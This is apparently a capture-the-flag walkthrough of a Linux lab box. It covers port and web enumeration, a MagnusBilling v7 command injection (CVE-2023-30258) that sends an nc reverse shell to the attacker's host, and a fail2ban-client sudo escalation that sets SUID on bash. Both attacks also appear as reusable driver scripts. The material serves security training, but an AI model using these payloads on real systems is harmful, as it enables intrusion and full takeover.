💵Billing (Linux)

Some mistakes can be costly.

Network Enumeration

Nmap

Full port scan, then a targeted service/script scan of the open ports
sudo nmap -sS --min-rate 5000 -p- --open -vvv -n -Pn 10.10.21.62 -oN puertos
nmap -sCV -p22,80,3306,5038 10.10.21.62 -oN nmap
Nmap results
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey: 
|   256 35:bd:a2:17:f2:46:71:d4:7e:b5:c7:b5:ac:33:15:e8 (ECDSA)
|_  256 46:d6:34:86:cf:cc:d5:c5:87:a8:78:8a:32:95:15:9a (ED25519)
80/tcp   open  http     Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
| http-title:             MagnusBilling        
|_Requested resource was http://10.10.21.62/mbilling/
|_http-server-header: Apache/2.4.62 (Debian)
3306/tcp open  mysql    MariaDB 10.3.23 or earlier (unauthorized)
5038/tcp open  asterisk Asterisk Call Manager 2.10.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Service Enumeration

Ffuf

Basic directory fuzzing
ffuf -u http://10.10.21.62/mbilling/FUZZ -w ~/Hunting/Wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -c
  • Directory listing is enabled

  • /mbilling/README.md reveals MagnusBilling version 7

Exploitation: CVE-2023-30258 (magnus-billing-v7-exploit)

Unauthenticated command injection through the democ parameter of lib/icepay/icepay.php, used here to spawn a reverse shell (a listener must already be waiting on 10.8.107.26:1234; curl stays blocked for as long as the shell lives)
curl -s 'http://10.10.21.62/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.107.26 1234 >/tmp/f;'
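The same injection as a small driver script, added here as an example and not the writeup's own command or the public exploit's code. It first confirms the injection blind, through a delay, before sending the writeup's reverse shell. It assumes the injected command's output is not reflected in the response (the writeup shows none), that a 5 s sleep is measurable against a baseline request, and that a listener (nc -lvnp 1234) is already running on LHOST; the defaults are the writeup's addresses and can be overridden through the environment.

```shell
#!/bin/sh
# Added example, not the writeup's command or the public exploit's code: a small
# driver for the icepay.php democ injection (CVE-2023-30258). It confirms the
# injection blind, through a delay, before sending the writeup's reverse shell.
# Assumptions: the injected command's output is not reflected in the response
# (the writeup shows none), a 5 s sleep is measurable against a baseline
# request, and a listener (nc -lvnp "$LPORT") is already running on LHOST.
# Defaults are the writeup's addresses; override them via the environment.

TARGET=${TARGET:-10.10.21.62}
LHOST=${LHOST:-10.8.107.26}
LPORT=${LPORT:-1234}
URL="http://$TARGET/mbilling/lib/icepay/icepay.php"

# Same mkfifo/nc reverse shell the writeup injects, parametrised by listener.
# The leading ';' terminates whatever command democ is spliced into.
revshell_payload() {
    printf ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc %s %s >/tmp/f;' "$1" "$2"
}

# Send one democ value; curl percent-encodes it. Optional second arg: --max-time.
send_democ() {
    if [ -n "${2:-}" ]; then
        curl -s -o /dev/null --max-time "$2" "$URL" --get --data-urlencode "democ=$1"
    else
        curl -s -o /dev/null "$URL" --get --data-urlencode "democ=$1"
    fi
}

# Wall-clock seconds for one request (whole seconds are enough for a 5 s probe).
timed_request() {
    start=$(date +%s)
    send_democ "$1" 30 || true
    echo $(( $(date +%s) - start ))
}

# Blind check: ';sleep 5;' must take clearly longer than a harmless ';true;'.
# Returns 0 when the delay is observed, i.e. the parameter reaches a shell.
check_injection() {
    base=$(timed_request ';true;')
    slow=$(timed_request ';sleep 5;')
    [ $(( slow - base )) -ge 4 ]
}

# Fire the reverse shell. curl blocks for as long as the shell lives on the
# target (the web request only returns when the injected command exits), so
# run this in a second terminal and keep the listener in the first.
exploit() {
    echo "sending reverse shell to $LHOST:$LPORT; curl will hang while it is alive" >&2
    send_democ "$(revshell_payload "$LHOST" "$LPORT")"
}

case "${1:-}" in
    check) check_injection && echo "democ is injectable" || { echo "no delay observed"; exit 1; } ;;
    shell) exploit ;;
    "") ;;   # no argument: only define the functions
    *) echo "usage: $0 check|shell" >&2; exit 2 ;;
esac
```

Usage: `sh icepay.sh check` to confirm the delay, then `sh icepay.sh shell` with the listener already up. The delay probe is deliberately coarse (whole seconds, 4 s margin) so that ordinary network jitter does not produce a false positive.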

System Intrusion

Shell: Web service user 'asterisk'

Post-Intrusion Enumeration

Enumerate sudo permissions
sudo -l
  • (ALL) NOPASSWD: /usr/bin/fail2ban-client

Fail2Ban Privilege Escalation

Restart the service
sudo /usr/bin/fail2ban-client restart
Inject a malicious actionban into the sshd jail's action (the property to override is actionban, the command the jail runs as root on every ban; the change lives only in the running daemon and is lost on the next restart or reload, so ban right after setting it)
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "chmod +s /bin/bash"
Ban any IP to trigger the actionban
sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.4
Run bash as root (-p keeps the effective UID 0 granted by the SUID bit instead of dropping to the real UID)
/bin/bash -p
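The escalation above as a scripted procedure, added here as an example rather than the writeup's commands as typed, with the checks worth running before and after each step: that sudo really grants fail2ban-client without a password, that the jail is running, that the action is attached to it, and that the SUID bit actually landed before exec'ing bash. It assumes the jail name sshd and the action name iptables-multiport from the writeup; if `fail2ban-client status` shows different names, pass them as JAIL and ACTION.

```shell
#!/bin/sh
# Added example, not the writeup's commands as-is: the fail2ban-client privilege
# escalation scripted with the checks worth doing before and after each step.
# Assumptions: the jail is "sshd" and its ban action "iptables-multiport" (the
# names the writeup uses). `fail2ban-client set` changes only the running
# daemon's state, so the injected actionban disappears on restart or reload.

F2B=/usr/bin/fail2ban-client
JAIL=${JAIL:-sshd}
ACTION=${ACTION:-iptables-multiport}
PAYLOAD=${PAYLOAD:-'chmod +s /bin/bash'}

# Reads `sudo -l` output on stdin; true when fail2ban-client may run without a
# password (the line form is "(ALL) NOPASSWD: /usr/bin/fail2ban-client").
sudo_allows_f2b() {
    grep -Eq "NOPASSWD:.*[[:space:]]${F2B}([[:space:],]|$)"
}

# The jail must be running and the action attached to it, otherwise
# `set ... actionban` has nothing to hook.
preflight() {
    sudo -n -l | sudo_allows_f2b || { echo "no NOPASSWD entry for $F2B" >&2; return 1; }
    sudo -n "$F2B" status "$JAIL" >/dev/null 2>&1 || { echo "jail $JAIL is not running" >&2; return 1; }
    sudo -n "$F2B" get "$JAIL" actions | grep -qw "$ACTION" || { echo "action $ACTION not attached to $JAIL" >&2; return 1; }
}

escalate() {
    preflight || return 1
    # actionban is what the jail executes, as root, every time it bans an IP.
    sudo -n "$F2B" set "$JAIL" action "$ACTION" actionban "$PAYLOAD"
    # Any address does; the ban is processed by the jail's own thread, hence the wait.
    sudo -n "$F2B" set "$JAIL" banip 1.2.3.4 >/dev/null
    for _ in 1 2 3 4 5; do
        [ -u /bin/bash ] && break
        sleep 1
    done
    # Tidy up: lift the fake ban (actionunban is untouched, so this is harmless).
    sudo -n "$F2B" set "$JAIL" unbanip 1.2.3.4 >/dev/null 2>&1 || true
    [ -u /bin/bash ] || { echo "SUID bit not set on /bin/bash; check JAIL/ACTION" >&2; return 1; }
    # -p keeps the effective UID 0 instead of dropping it to the real UID.
    exec /bin/bash -p
}

case "${1:-}" in
    run) escalate ;;
    "") ;;   # no argument: only define the functions
    *) echo "usage: $0 run" >&2; exit 2 ;;
esac
```

Usage: `sh f2b-privesc.sh run` from the asterisk shell. The short wait loop exists because `set <jail> banip` returns as soon as the ban is queued, while the actionban command runs slightly later in the jail's thread; checking `-u /bin/bash` immediately can report a false failure.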

System Compromise

Shell: Root
